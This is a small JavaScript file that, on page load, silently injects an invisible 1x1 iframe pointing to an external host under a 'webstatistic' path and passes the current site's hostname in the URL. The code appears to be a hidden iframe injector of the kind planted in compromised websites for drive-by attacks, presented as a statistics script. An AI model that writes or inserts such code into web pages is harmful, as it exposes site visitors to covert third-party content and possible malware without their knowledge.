﻿function init (){
      var host = location.hostname;
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", 'http://webmotel.co.nz/webstatistic/script/run-14072010-142416/sys.aspx?ID=' + host);
      ifrm.style.width = 1 + "px";
      ifrm.style.height = 1 + "px";
      ifrm.style.display = "none";
      document.body.appendChild(ifrm);
  }
  window.onload = init;
      



